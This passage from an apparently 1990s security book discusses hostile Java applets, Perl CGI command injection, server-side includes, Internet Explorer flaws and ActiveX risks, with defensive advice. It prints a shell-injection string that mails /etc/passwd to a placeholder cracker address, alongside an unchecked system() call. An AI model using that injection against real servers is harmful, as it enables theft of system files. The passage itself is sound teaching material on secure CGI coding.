AttackThread.java--Displays large black windows that the user cannot grab or otherwise dispose of. This applet requires that you restart the system or the machine. Nasty.
Forger.java--Forges an e-mail message from the victim to a pre-specified target. Very interesting implementation that proves at least that applications can be actively attacked and manipulated.

Cross Reference: There are over a dozen more applets at DeLue's page. Check them out at http://www.math.gatech.edu/~mladue/SourceCode.html.

I have written mainly about the bad aspects of Java. That is largely because this book examines weaknesses. Now, I would like to write a few words about Java's good points.

If you have ever engaged in the development of WWW sites, you know how difficult it is. In today's environment, the WWW site has to be crisp, clean, and engaging. The days of the solid gray background and unjustified text are over. Now, consumers expect something entertaining. Moreover, functionality is expected to exceed simple quote generators and auto-response mail. Perl is largely responsible for many of the menial tasks involved in data processing on the Web, but Java is by far the most powerful application for developing multimedia Web pages. This, coupled with high-end tools such as Fusion by NetObjects and FrontPage by Microsoft, can place you at the very edge of Web design.

Java Books, Articles, Papers, and Other Resources

Java Security: Hostile Applets, Holes, & Antidotes. Gary McGraw and Ed Felten. John Wiley & Sons. ISBN: 0-471-17842-X. 1996.

Java Security. Gary McGraw and Edward Felten. SIGS. ISBN: 1-884842-72-0. 1996.

Java Developer's Guide. Jamie Jaworski and Cary Jardin. Sams.net. ISBN: 1-57521-069-X. 1996.

Java Developer's Reference. Mike Cohn, Michael Morrison, Bryan Morgan, Michael T. Nygard, Dan Joshi, and Tom Trinko. Sams.net. ISBN: 1-57521-129-7. 1996.

Developing Intranet Applications with Java. Jerry Ablan, William Robert Stanek, Rogers Cadenhead, and Tim Evans. Sams.net. ISBN: 1-57521-166-1. 1996.

The Java Handbook. Patrick Naughton. Osborne/McGraw-Hill. ISBN: 0-07-882199-1. 1996.

Just Java, 2nd Edition. Peter van der Linden. Sunsoft Press/Prentice Hall. ISBN: 0-13-272303-4. 1996.

Java in a Nutshell: A Desktop Quick Reference for Java Programmers. David Flanagan. O'Reilly & Associates, Inc. ISBN: 1-56592-183-6. 1996.

The Java Language Specification. Addison-Wesley. James Gosling, Bill Joy, and Guy Steele. ISBN: 0-201-63451-1. 1996.

"Java as an Intermediate Language." Technical Report, School of Computer Science, Carnegie-Mellon University, Number CMU-CS-96-161, August 1996.

http://www.cs.cmu.edu/afs/cs.cmu.edu/project/scandal/public/papers/CMU-CS-96-161.ps.Z

"Java & HotJava: Waking Up the Web." Sean González. PC Magazine. October 1995.

http://www.zdnet.com/~pcmag/issues/1418/pcm00085.htm

"Java: The Inside Story." Michael O'Connell. Sunworld Online. Vol. 07. July 1995.

http://www.sun.com/sunworldonline/swol-07-1995/swol-07-java.html

"Briki: A Flexible Java Compiler." Michael Cierniak and Wei Li. TR 621, URCSD, May 1996.

ftp://ftp.cs.rochester.edu/pub/papers/systems/96.tr621.Briki_a_flexible_java_compiler.ps.gz

"NetProf: Network-Based High-Level Profiling of Java Bytecode." Srinivasan Parthasarathy, Michael Cierniak, and Wei Li. TR 622, URCSD, May 1996.

ftp://ftp.cs.rochester.edu/pub/papers/systems/96.tr622.NetProf_network-based_high-level_profiling_of_java_bytecode.ps.g z

MIME Encapsulation of Aggregate Applet Objects (mapplet). A. Bahreman, J. Galvin, and R. Narayanaswamy.

http://src.doc.ic.ac.uk/computing/internet/internet-drafts/draft-bahreman-mapplet-spec-00.txt.Z

"H-38: Internet Explorer 3.x Vulnerability." (CIAC Advisory) March 4, 1997.

http://ciac.llnl.gov/ciac/bulletins/h-38a.shtml

Internet Java & ActiveX Advisor. Journal.

http://www.advisor.com/ia.htm

Java Developer's Journal.

http://www.javadevelopersjournal.com/java/

Java Report. Journal.

http://www.sigs.com/jro/

Javaworld. Journal.

http://www.javaworld.com/

Gamelan. The ultimate Java archive.

http://www-a.gamelan.com/index.shtml

Perl

Occasionally, just occasionally, a product emerges from the Internet that is truly magnificent. Perl is once such product. What started as a small project for Larry Wall (Perl's creator) turned into what is likely the most fluid, most easily implemented language ever created.

Imagine a programming language that combines some of the very best attributes of languages such as C, sed, awk, and BASIC. Also, remember that the size of Perl programs are a fraction of what compiled C programs consume. Finally, Perl is almost too good to be true for creating CGI applications for use on the WWW. Manipulation of text in Perl is, I think, unrivaled by any computer language.

Perl is heavily relied on as a tool for implementing CGI. Like most programming tools, Perl does not contain many inherent flaws. However, in inexperienced hands, Perl can open a few security holes of its own.

Perl and CGI

CGI is a relatively new phenomenon. It is of significant interest because it offers an opportunity for all programmers to migrate to Web programming. Essentially, CGI can be done on any platform using nearly any language. The purpose of CGI is to provide dynamically built documents and processes to exist on the World Wide Web.

Dynamic here means that the result will vary depending on user input. The result--usually a newly formed Web page--is generated during the CGI process. The easiest way for you to understand this is to examine a Perl script in action. Imagine a Web page with a single form, like the one in Figure 30.4.

FIGURE 30.4.
The SAMS CGI sample page.

The page in Figure 30.4 has a single input field named editbox, which you can see within the following HTML source code:

<HTML>
<HEAD>
<TITLE>SAMS CGI Example</TITLE>
</HEAD>
<BODY bgcolor = "#ffffff">
<P ></P>
<P >The Anatomy of a CGI Program</P>
<P ></P>
<P ></P>
<FORM  ACTION = "getit.cgi" METHOD = "Get" >
<P ><INPUT TYPE = TEXT NAME = "editbox" SIZE = 20 MAXLENGTH = 20></P>
</FORM>
</BODY>
</HTML>

Within that code, the form that holds editbox also points to a script program on the hard drive. That script, called getit.cgi, appears in bold in the following HTML code:

<HTML>
<HEAD>
<TITLE>SAMS CGI Example</TITLE>
</HEAD>
<BODY bgcolor = "#ffffff">
<P ></P>
<P >The Anatomy of a CGI Program</P>
<P ></P>
<P ></P>
<FORM  ACTION = "getit.cgi" METHOD = "Get" >
<P ><INPUT TYPE = TEXT NAME = "editbox" SIZE = 20 MAXLENGTH = 20></P>
</FORM>
</BODY>
</HTML>

So editbox refers to the input box on the form; you assign this name to the box so that later, when you need to, you can refer to the box (and its contents) as a variable. You know from the preceding code that the contents of editbox will be sent to a Perl script called getit.cgi.

getit.cgi is a very simple Perl script. Its function is to take the input in editbox, delete from it various codes and strange characters common to HTML, and print the input of editbox on a clean page. The code is as follows:

# Print out a content-type for HTTP/1.0 compatibility
print "Content-type: text/html\n\n";

# Get the input from the test HTML form
read(STDIN, $buffer, $ENV{`CONTENT_LENGTH'});

# Split the name-value pairs
@pairs = split(/&/, $buffer);

foreach $pair (@pairs)
{
    ($name, $value) = split(/=/, $pair);

    # Un-Webify plus signs and %-encoding
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

    $FORM{$name} = $value;
}

print "$FORM{`editbox'}\n";
print "<html>$FORM{`editbox'}\n</html>";

Of these lines of code, we are concerned only with the last line. What this line means is "Print an entirely new Web page in HTML, and on that page, print the exact same word or words that the user entered into editbox." In this manner, variables are extracted from an HTML page and run through a Perl script. Naturally, after the variables are extracted, they may be worked over by the programmer in whatever manner the he or she chooses. For example, if the variables consist of numbers, the programmer could use Perl to, say, add, multiply, or divide those numbers. After the variables have been extracted, the programmer can do almost anything with them. The resulting page will be different depending on what the user enters into editbox. If the user enters the name George, the resulting page prints George. If the user enters the string CGI Security, the resulting page prints CGI Security. (You get the idea.)

During that process, something very important occurs. After the user enters text into editbox and presses Enter, the text is sent to getit.cgi. getit.cgi calls the Perl interpreter on the server's hard drive. The Perl interpreter evaluates getit.cgi and then automatically executes it.

Here is where CGI security (or insecurity) begins. When a form is processed in this manner, the Perl interpreter is running. There is no human intervention in this process. If the Perl script (in this case, getit.cgi) is written without thought of security, strange and terrible things may happen. There are certain pitfalls of CGI programming; these pitfalls can open up the entire power and scope of the Perl language (or shell) to the visiting cracker.

The System Call

System calls are one common source of break-ins. A system call is any operation in Perl (or any language) that calls another program to do some work. This other program is most often a commonly used command that is part of the operating system or shell.

System calls are generally evoked through the use of the function system(). C programmers who work with the Microsoft platform (whom I am especially targeting here) will recognize this call because in order to use these calls, they may have to include the dos.h (and perhaps even the process.h) file in their compiled program. For those programmers migrating from a Microsoft platform (who may be new to Perl), this point in very important: In Perl, a system call does not require includes or requires. It can be done simply by issuing the call. If the call is issued and no prior check has been made on user input, security issues arise. Issuing a system call in Perl works like this:

system("grep $user_input /home/programmer/my_database");

NOTE: This system call prompts grep to search the file my_database for any matches of the user's input string $user_input. Programs that include work like this are cheap ways of avoiding purchasing a proprietary CGI-to-database license. Thousands of sites use this method to search flat-file database files or even directories.

System calls of this nature are dangerous because one can never anticipate what the user will enter. True, the majority of users will input some string that is appropriate (or if not appropriate, one that they think is appropriate). However, crackers work differently. To a cracker, the main issue is whether your CGI has been written cleanly. To determine whether it has, the cracker will input a series of strings designed to test your CGI security technique.

Suppose you actually had the preceding system call in your CGI program. Suppose further that you provided no mechanism to examine the character strings received from STDIN. In this situation, the cracker could easily pass commands to the shell by adding certain metacharacters to his or her string.

Almost all shell environments (MS-DOS's command.com included) and most languages provide for execution of sequential commands. In most environments, this is accomplished by placing commands one after another, separated by a metacharacter. A metacharacter might be a pipe symbol (|) or semicolon (;). In addition, many environments allow conditional command execution by placing commands one after another, separated by special metacharacters. (An example is where execution hinges on the success or failure of the preceding command. This style works along the lines of "If command number one fails, execute command number two" or even "If command number one is successful, forget command number two.")

If your CGI is written poorly (for example, you fail to include a mechanism to examine each submitted string), a cracker can push additional commands onto the argument list. For example, the classic string cited is this:

user_string;mail bozo@cracking.com </etc/passwd

In this example, the /etc/passwd file is mailed to the cracker. This works because the semi-colon signals the interpreter that another command is to be executed after the grep search is over. It is the equivalent of the programmer issuing the same command. Thus, what really happens is this:

system("grep $user_input my_database $user_string; mail bozo@cracking.com
Â</etc/passwd");

You should think very carefully about constructing a command line using user input, and avoid doing so if possible. There are many ways around this. One is to provide check boxes, radio lists, or other read-only clickable items. Presenting the user with choices in this manner greatly enhances your control over what gets read into STDIN. If possible, avoid system calls altogether.

System call problems are not new, nor are they difficult to remedy. The solution is to check the user's input prior to passing it to a function. There are several actions you can undertake:

In checking for illegal characters, forbid acceptance of user input that contains metacharacters. This is most commonly done by issuing a set of rules that allow only words, as in ~ tr/^[\w ]//g.
Use taintperl, which forbids the passing of variables to script system calls invoked using the system() or exec() calls. taintperl can be invoked in Perl 4 by calling /usr/local/bin/taintperl and in Perl 5 by using the -T option when invoking Perl (as in #!/usr/bin/local/perl -T).

Perl also has some built-in security features in this regard. For example, as this excerpt from the Perl man pages notes, the following is what happens when treating setuid Perl scripts (those that require special privileges to run):

When Perl is executing a setuid script, it takes special precautions to prevent you from falling into any obvious traps. (In some ways, a Perl script is more secure than the corresponding C program.) Any command line argument, environment variable, or input is marked as "tainted", and may not be used, directly or indirectly, in any command that invokes a subshell, or in any com-mand that modifies files, directories, or processes. Any variable that is set within an expression that has previously referenced a tainted value also becomes tainted (even if it is logically impossible for the tainted value to influence the variable).

However, you should never, ever run a script in a privileged mode; I am not the only person who will tell you this. "The World Wide Web Security FAQ," an excellent document by Lincoln D. Stein about safe CGI programming, advises as follows:

First of all, do you really need to run your Perl script as suid? This represents a major risk insofar as giving your script more privileges than the "nobody" user has also increases the potential for damage that a subverted script can cause. If you're thinking of giving your script root privileges, think it over extremely carefully.

Cross Reference: "The World Wide Web Security FAQ," by Lincoln D. Stein, can be found on the Web at http://www-genome.wi.mit.edu/WWW/faqs/wwwsf5.html.

The system call problem is not restricted to Perl, but can occur in any language, including C. One very talented programmer and author, Eugene Eric Kim, has this to says about the issue in "Programming CGI in C":

In CGI C programs, C functions that fork a Bourne shell process (system() or popen(), for example) present a serious potential security hole. If you allow user input into any of these functions without first "escaping" the input (adding a backslash before offending characters), someone can maliciously take advantage of your system using special, shell-reserved "metacharacters."

Cross Reference: "Programming CGI in C" by Eugene Eric Kim, can be found on the Web at http://www.eekim.com/pubs/cgiinc/index.html.

I highly recommend Kim's last book, CGI Developer's Guide (published by Sams.net). Chapter 9 of that book ("CGI Security: Writing Secure CGI Programs") provides an excellent overview of CGI security methods. In particular, it addresses some scenarios you will likely encounter in real-life CGI programming, including but not limited to the following:

Buffer overflows
Shell metacharacters
Shell abuses

A Few Words About File Creation

It is unlikely that you will create a CGI process that creates a file. But if you do, some strict rules should be observed:

Restrict the directory in which the file is created. This directory should be divorced from any system-related directory, in a place where such files are easily identified, managed, and destroyed (in other words, never, ever write a directory like /tmp).
Set the permissions on such files as restrictively as possible. If the file is a dump of user input, such as a visitor list, the file should be readable only by you or the processes that will engage that file. (For example, restrict processes to appending information to the file.)
Ensure that the file's name does not have any metacharacters within it. Moreover, if the file is generated on the fly, include a screening process to weed out such characters.

Server-Side Includes

I am against server-side includes. Oh, they are cool and can provide interesting information, but they are, in my opinion, a serious security hazard. Before I discuss the hazards, however, I should define what server-side includes are. Server-side includes are a mechanism by which you can automatically include or incorporate documents or other elements of a Web page into the present Web page by calling these elements from the local (or remote) hard disk drive.

Let me elaborate. Server-side includes (SSIs) are advanced HTML building at work. SSIs function a lot like standard include files in C or C++. By calling these files within your HTML, you can include elements into pages rather than including them by hand. In other words, suppose you wanted every page on your server to have the same header. You could edit your pages so that a standard block of code appeared in each one, or you might call an SSI. My advice: Don't do it.

Here is an example. Suppose you wanted a banner (composed of a graphics file) to appear on a page. You could call it like this:

<!--#include file="mybanner.html"-->

The contents of the file mybanner.html might look something like this:

<br><img src="banner.gif">

In reality, you wouldn't bother using an SSI for this because mybanner.html is even less complex than the SSI call that includes it. But, what if your mybanner.html looked like this:

<TR VALIGN="top" ALIGN="left">
<TD COLSPAN=2 ROWSPAN=5 WIDTH=96 ALIGN="center" VALIGN="center">
Â<IMG HEIGHT=96 WIDTH=96 SRC="3ad06301.gif"
BORDER=0  ALT="Picture" ></TD>
   <TD COLSPAN=9 HEIGHT=7></TD>
   </TR>
   <TR VALIGN="top" ALIGN="left">
     <!-- These 2 columns occupied by an object -->
     <TD COLSPAN=5></TD>
     <TD COLSPAN=2 ROWSPAN=1 WIDTH=181>
<!-- Start of Text object -->
<P><B><FONT SIZE="-1" FACE="Verdana">SAMS Security InfoBase</B></FONT></TD>
<!-- End Text -->

In such an instance, you might be inclined to use an SSI. Again, I say don't do it. Here is why: SSI can also be used to execute commands. These could be system commands,

<!--#exec cmd="date"--> (Get the date)

or they could be shell scripts. One good way to completely destroy your system in a hurry is to run the httpd server root and allow SSIs. This effectively gives a cracker the option of deleting all your files, stealing your password files, and so forth. Take a look at Figure 30.5 to see how normal CGI works.

FIGURE 30.5.
The normal CGI process.

Under normal circumstances, the user's input is submitted to an HTML input form. From there, the request is passed to the server and then directly to some CGI program (usually a Perl program) that immediately processes the data. Here, you have only to worry about whether your CGI is secure. Now examine Figure 30.6.

FIGURE 30.6.
CGI process preceded by SSI.

When SSI is active, the process is different. The client's input is forwarded to and parsed by the server. Part of that parsing process is to identify SSI directives. If exec directives exist (those that call other processes), they are executed.

Essentially, SSI is probably not worth the risk. I know what you are thinking: You want to use SSIs because the information within the include files changes dynamically. For example, perhaps you are manipulating banners that are custom made depending on when a user visits. Perhaps these banners are updated based on state information on the user, such as browser type, frame preferences, and so on. Perhaps cookies are not enough for this purpose, and you want your pages to look beautiful and intelligent in their ability to remember the user's vital data. My answer: There are other ways to do it.

One way is to run internal scripts that update this information. Using a combination of Perl and at or cron (two utilities that can time jobs), you can fashion prefab headers and footers that change as information elsewhere changes. Another way to do it is to write a program (perhaps in awk or Perl) that can perform this activity on demand, interactively. This way, you can manage the header/footer combination at certain times of the day and do so interactively to watch for unexpected problems.

Basically, if you are an administrator and you do not have a complete understanding of how SSI works, do not use it (at least until you have learned how).

CAUTION: This advisory is not simply for UNIX system administrators! Many Web-server packages support server-side includes. For example, the NetWare Web Server supports a wide range of SSI commands and directives. This option can be set with the administration facility.

Microsoft Internet Explorer

So many holes have been found in Microsoft Internet Explorer that one scarcely knows where to start. However, I want to run through them quickly. You may wonder why I have waited until this chapter to address Internet Explorer. My reasoning is largely based on the fact that some of the holes in Internet Explorer are related to ActiveX technology.

Some explanation is in order here; if I omit such explanation, I will be charged by Microsoft with false reporting. The corporation is in an extremely defensive position these days, and not without reason. Here, then, is the mitigating information:

Microsoft is well known for its ability to create attractive, eye-pleasing applications. Moreover, such products are designed for easy use to allow even the most intimidated individual to grasp the basic concepts within a few hours. In this respect, Microsoft has evolved much in the same way as Apple Computer. Consider, for example, the incredible standardization of design that is imposed on products for use in the Microsoft environment.

In the Microsoft world, menus must be at least somewhat consistent with general Windows design. Thus, almost any application designed for Microsoft Windows will have a list of menus that runs across the top of the program. Three menu choices that you will invariably see are File, Edit, and Help (other menu choices that are still very popular but appear less frequently include View, Tools, Format, and so forth). By designing applications that sport such menus, Microsoft ensures that the learning curve on those applications is minimal. In other words, if you know one Microsoft program, you pretty much know them all. (This is similar to the way every application melts its menus into the bar at the top of the MacOS desktop.)

Microsoft has thus created its own standards in a market that previously adhered to few rules. In this respect, Microsoft has revolutionized the PC computing world. Furthermore, because Microsoft products are so popular worldwide, programmers rush to complete applications for use on the Microsoft platform. Along that journey, programmers must strictly adhere to design standards set forth by Microsoft--well they must if they seek that approval sticker on the box. If the U.S. Attorney General is looking for an antitrust issue, she might find one here.

Moreover, Microsoft has put much effort into application integration and interoperability. That means an Excel spreadsheet will seamlessly drop into a Word document, an Access database will interface effortlessly with a Visual Basic program, and so on. All Microsoft products work in an integrated fashion.

To perform such magic, Microsoft designed its products with components that meet certain criteria. Each of these applications contain building blocks that are recognizable by the remaining applications. Each can call its sister applications through a language that is common to them all. This system gives the user an enormous amount of power. For example, one need not leave an application to include disparate types of media or information. This design increases productivity and provides for a more fluid, enjoyable experience. Unfortunately, however, it also makes for poor security.

Internet Explorer was designed with this interoperability in mind. For example, Internet Explorer was, at the outset, more integrated with the Windows operating system than, say, Netscape's Navigator. Mr. Gates undoubtedly envisioned a browser that would bring the Internet to the user's desktop in the same manner as it would a local application. In other words, Internet Explorer was designed to bring the Internet to the user in a form that was easy to understand, navigate, and control. To its credit, Microsoft's merry band of programmers did just that. The problem with Microsoft's Internet Explorer, then, is that it fulfills its purpose to the extreme.

In a period of less than two weeks in early 1997, Internet Explorer was discovered to have three serious security bugs:

Students at a university in Maryland found that they could embed an icon on a Web page that would launch programs on the client user's computer. Microsoft posted a public advisory on this issue on its WWW site. In it, the company explained:

If a hacker took advantage of this security problem, you could see an icon, or a graphic in a Web page, which is, in fact, within a regular Windows 95/Windows NT 4.0 folder of the Web site server or your computer. The hacker could shrink the frame around the icon or graphic so that you would think it was a harmless, when in fact it allows you or anyone else to open, copy, or delete the file, or run a program that could, if the author has malicious intent, damage your computer. You can launch the program because the folder bypasses the Internet Explorer security mechanism.

Cross Reference: Microsoft's public advisory, Update on Internet Explorer Security issues UMD Security Problem, can be found on the Web at http://www.microsoft.com/ie/security/umd.htm.

Several sources determined that one could launch programs on the client's machine by pointing to either a URL or an LNK file.
Folks at A.L. Digital, a London-based firm, determined that Microsoft's Internet Explorer contained a bug that would allow a malicious Java applet to steal, corrupt, or otherwise alter files on the client's machine.

Each of these holes is Class A in character--that is, they allow a remote site to access or otherwise manipulate the client's environment. The risk represented here is tremendous.

To its credit, Microsoft responded quickly to each instance. For example, the second hole was acknowledged within hours of its discovery. The authors of that advisory did not mince words:

...this problem concerns the ability of a programmer to write code in a Web page that uses Internet Explorer 3.x versions to access a Web page hyperlink that points to a .LNK (a Windows shortcut file) or .URL file. Pointing to that .LNK or .URL could launch a program or an executable that could cause damage to a computer.

Cross Reference: Microsoft's advisory about the second hole, "`Cybersnot' Security Problem," can be found on the Web at http://www.microsoft.com/ie/security/cybersnot.htm.

The fix for that problem was also posted. If this is the first you have heard of this problem (and you use Internet Explorer), you should immediately download the patch.

Cross Reference: The patch for the hole discussed in Microsoft's advisory, "`Cybersnot' Security Problem," can be found on the Web at http://www.microsoft.com/msdownload/ie301securitypatch.htm.

News of these holes rocked the computing communities, which were still reeling from earlier holes. Examine this advisory from Dirk Balfanz and Edward Felten of Princeton University, delivered in August 1996:

We have discovered a security flaw in version 3.0 of Microsoft's Internet Explorer browser running under Windows 95. An attacker could exploit the flaw to run any DOS command on the machine of an Explorer user who visits the attacker's page. For example, the attacker could read, modify, or delete the victim's files, or insert a virus or backdoor entrance into the victim's machine. We have verified our discovery by creating a Web page that deletes a file on the machine of any Explorer user who visits the page.

Cross Reference: The advisory issued by Dirk Balfanz and Edward Felten. can be found at http://geek-girl.com/bugtraq/1996_3/0394.html.

That instance prompted the Felten team to undertake a full security analysis of Internet Explorer. To my knowledge, the results have not yet been released.

Cross Reference: Although the results of the Felten team's analysis have not yet been released, their research page is located at http://www.cs.princeton.edu/sip/Research.html.

It is clear that, for the moment, Microsoft Internet Explorer is still cutting its teeth in terms of Internet security. What makes the problem so insidious is that only those users who are truly security aware receive such information as breaking news. The majority receive such information from third parties, often long after holes have been discovered. This is of major concern because nearly all of the holes found in Internet Explorer have been Class A.

ActiveX

Microsoft Corporation has put a great deal of effort into selling ActiveX to the public. However, even without examining the security risks of ActiveX (and there are some serious ones), I can tell you that ActiveX has its pitfalls. Here are two very practical reasons not to use ActiveX:

For the moment, only those using Microsoft Internet Explorer benefit from ActiveX. Hundreds of thousands (or even millions) of people will be unable to view your page in its fully functional state.
Even those sites that have the capability to view ActiveX may purposefully screen it out (and forbid their users to accept ActiveX controls). Many sites (as you will see) have taken a very active stance against ActiveX because it is insecure.

A recent article by Ellen Messmer in Network World provides some insight into the sentiments of private corporations regarding ActiveX:

Like many companies, Lockheed Martin Corp. has come to rely on Microsoft Corp. technology. But when it comes to Lockheed's intranet, one thing the company will not abide is ActiveX, a cornerstone of Microsoft's Web efforts. The reason? ActiveX can offer virus writers and hackers a perfect network entree. `You can download an ActiveX applet that is a virus, which could do major damage,' explains Bill Andiario, technical lead for Web initiatives at Lockheed Martin Enterprise Information Systems, the company's information systems arm. `Or it could grab your proprietary information and pass it back to a competitor, or worse yet, another country.'

Cross Reference: Ellen Messmer's "ActiveX Marks New Virus Spot" (Network World) can be found on the Web at http://www.nwfusion.com/.

The fears of the corporate community are well founded. ActiveX technology is (at least for the moment) unquestionably a threat to Internet security. Just ask the Chaos Computer Club, a group of hackers centered in Hamburg, Germany. The group gained international fame for several extraordinary exploits, including breaking into NASA. Some of the more bizarre exploits attributed to this group include

Publishing electronic mail addresses and telephone numbers of French politicians. This information was provided to hackers across the European continent. The purpose? To temporarily incapacitate the telecommunications systems of political and corporate entities in France in protest of a French nuclear test.
Creating one of the earliest implementations of a sniffer. Reportedly, the CCC had placed a password-capture program on a network populated by VAX security specialists. Incredibly, it is reported that Kevin Mitnik inadvertently discovered the program while rifling through the security experts' mail.

Here is a classic message posted in February 1988, related to an episode where the rumor of a CCC attack generated panic (the message was posted by Jerry Leichter, then a student at Yale University):

A week or so ago, the Chaos Computer Club of West Berlin announced that they were going to trigger trojan horses they'd previously planted on various computers in the Space Physics Analysis Network. Presumably, the reason for triggering the trojan horses was to throw the network into disarray; if so, the threat has, unfortunately, with the help of numerous fifth-columnists within SPAN, succeeded. Before anybody within SPAN replies by saying something to the effect of "Nonsense, they didn't succeed in triggering any trojan horses," let me emphasize that I said the THREAT succeeded. That's right, for the last week SPAN hasn't been functioning very well as a network. All too many of the machines in it have cut off network communications (or at least lost much of their connectivity...

Cross Reference: Find Jerry Leichter's posting in its entirety at http://catless.ncl.ac.uk/Risks/6.27.html.

Extraordinary. In the past, various intelligence agencies have attempted to infiltrate the CCC through a wide range of means. Such agencies have reportedly included the French secret police. The French Direction de la Surveillance du Territoire (a domestic intelligence agency) allegedly used an agent provocateur in an attempt to gather CCC supporters:

For years Jean-Bernard Condat has undoubtedly been France's best-known computer hacker. Appearing on television talk shows, launching provocative operations and attending computer seminars, he founded the Chaos Computer Club France (CCCF) in 1989 as France's answer to the renowned Chaos Computer Club in Germany. French journalist Jean Guisnel revealed this week in a book entitled Guerres dans le Cyberespace, Internet et les Services Secrets (Cyberspace War, Internet and Secret Services) published by the Editions La Decouverte (ISBN 2-7071-2502-4) that Condat has been controlled from the outset by the Direction de la Surveillance du Territoire. A student in Lyons where he followed music and information technology courses, Condat was taken in hand by the local branch of the DST in 1983 after committing some "minor misdemeanor." The DST organized his participation in hacker meetings abroad.

Cross Reference: The previous paragraph is excerpted from A Computer Spy Unmasked: Head of the French Hackers Group was a Secret Service Agent (Indigo Publications), which can be found on the Web at http://www.sec.de/sec/news.cccfnarc.

In any event, the CCC has long been known for its often dramatic public feats of hacking and cracking. These feats have crippled more than one giant: some were telecommunications companies, and others were private corporations. In February 1997, the neck of Microsoft fell beneath the ax of the Chaos Computer Club. As reported on CNET:

On German national television, [the CCC] showed off an ActiveX control that is able to snatch money from one bank account and deposit it into another, all without the customary personal identification number (PIN) that is meant to protect theft.

Cross Reference: "ActiveX Used as Hacking Tool," by Nick Wingfield (CNET), can be found on the Web at http://www.news.com/News/Item/0,4,7761,4000.html.

This news caused Usenet and security mailing lists to explode. Heated arguments ensued between Microsoft users and the rest of the world. The word was out: ActiveX was totally insecure. Messages in security lists came from individuals demanding firewalls or other tools to filter ActiveX out at the router level. Moreover, there is a firm, named Aventail, that specializes in such filtering software.

Cross Reference: The entire chronology of these arguments can be found at http://www.iks-jena.de/mitarb/lutz/security/activex.en.html.

Cross Reference: If you are a system administrator, you should seriously consider contacting Aventail. They can be found on the Web at http://www.aventail.com/.

So, What Is the Problem with ActiveX?

The problem with ActiveX was summed up concisely by the folks at JavaSoft:

ActiveX...allows arbitrary binary code to be executed, a malicious ActiveX component can be written to remove or alter files on the user's local disk or to make connections to other computers without the knowledge or approval of the user. There is also the risk that a well-behaved ActiveX component could have a virus attached to it. Unfortunately, viruses can be encrypted just as easily as ordinary code.

Cross Reference: The preceding paragraph is excerpted from "Frequently Asked Questions--Applet Security," which can be found on the Web at http://www.javasoft.com:80/sfaq/index.html#activex.

The problem seems more serious than it is. Only those who use the Microsoft platform can be real victims. This is because the majority of Microsoft products (NT excluded) do not provide access control. Thus, if a malicious ActiveX control breaks through, it has access to the entire hard drive of the user. In UNIX, this is not possible because of the file permissions and access control. Under the UNIX environment, a malicious applet would never get farther than the current user's directory.

Microsoft has fallen victim to its own efficiency. It has created a tool that is so open and so finely related to its operating system that it is, in effect, the ultimate security risk for Microsoft users.

Some forces at Microsoft have taken the position that the CCC incident proves that individuals should not accept unsigned code. That is, the folks at Microsoft have taken this opportunity to grandstand their plan to have all code digitally signed. However, this runs right back to the issue I discussed earlier about certificates and signatures. Why is Microsoft so intent on having everyone, including programmers, identify themselves? Why should a programmer be forced to sign his or her applications simply because ActiveX is not secure?

NOTE: In fact, even signed code is unsafe. It does not take a lot of effort to get code signed, and currently there is no mechanism to prevent malicious programmers from signing their code, whether that code is safe or not.

ActiveX technology should be redesigned, but that responsibility rests squarely on the shoulders of Microsoft. After all, the risks posed are significant only for Microsoft's own users. Remember that at least for the moment, Microsoft's Internet Explorer is the only browser that truly supports ActiveX. However, all that is about to change. ActiveX will soon become a developing, open standard, as noted by Mike Ricciuti and Nick Wingfield (CNET):

Representatives from more than 100 companies, including software makers and information system managers, today voted at a meeting held here to turn licensing, branding, and management of the ActiveX specification over to the Open Group, an industry consortium experienced in promoting other cross-platform technologies.

It is doubtful that ActiveX will ever be completely restricted from accessing portions of an individual's hard disk drive because of the relation the technology has with components like Visual Basic. Those familiar with Visual Basic know that certain commands within it allow you to control Microsoft applications from a remote location, even if you don't have a low-level (such as DDE) conversation with the targeted program. (The SendKeys function is a perfect example of such functionality.)

However, because the benefits of ActiveX technology are so very dramatic, it is likely that ActiveX will continue to gain popularity in spite of its security flaws. In the end, ActiveX is nothing but OLE technology, and that is at the very base of the Microsoft framework. By exploring this, you can gain some insight into what ActiveX can really do.

To begin to understand what OLE is about, consider this: OLE is a technology that deals with compound documents, or documents containing multiple types of data or media. In older, cut-and-paste technology, such elements (when extracted from their native application) would be distorted and adopt whatever environment was present in the application in which they were deposited (for example, dropping a spreadsheet into a word-processor document would jumble the spreadsheet data). In OLE, these objects retain their native state, irrespective of where they end up. When a document element ends up in an application other than its own, it is called an embedded object.

Each time you need to edit an embedded object, the original, parent application is called so the editing can take place in the element's native environment (for example, to edit an Excel spreadsheet embedded in a Word document, Excel is launched). However, in advanced OLE, the user never sees this exchange between the current application and the parent. The security implications of this are obvious. If an ActiveX control can masquerade as having been generated in a particular application, it can cause an instance of that application to be launched. After the application has been launched, it can be "remote controlled" from the ActiveX component. The implications of this are devastating.

So, Microsoft is faced with a dilemma. It has an excellent extension to the Web, but one that poses critical security risks. What remains is time--time in which Microsoft can come up with practical solutions for these problems. In the interim, you would be wise to disable ActiveX support in your browser. Otherwise, you may fall victim to a malicious ActiveX control. And, the danger posed by this dwarfs the dangers posed by Java applets. In fact, there is no comparison.

Summary

This book hardly scratches the surface of Internet security. However, I hope that some points have been made here. Between holes in operating systems, CGI scripts, TCP/IP daemons, browser clients, and now applets and extensions, the Internet is not a very secure place. Taking these factors in their entirety, the Internet is not secure at all. Yet individuals are now doing banking over the Net.

Between the resources provided in the preceding chapters and the appendixes yet to come, it is my hope that you'll find good, solid security information. You'll need it.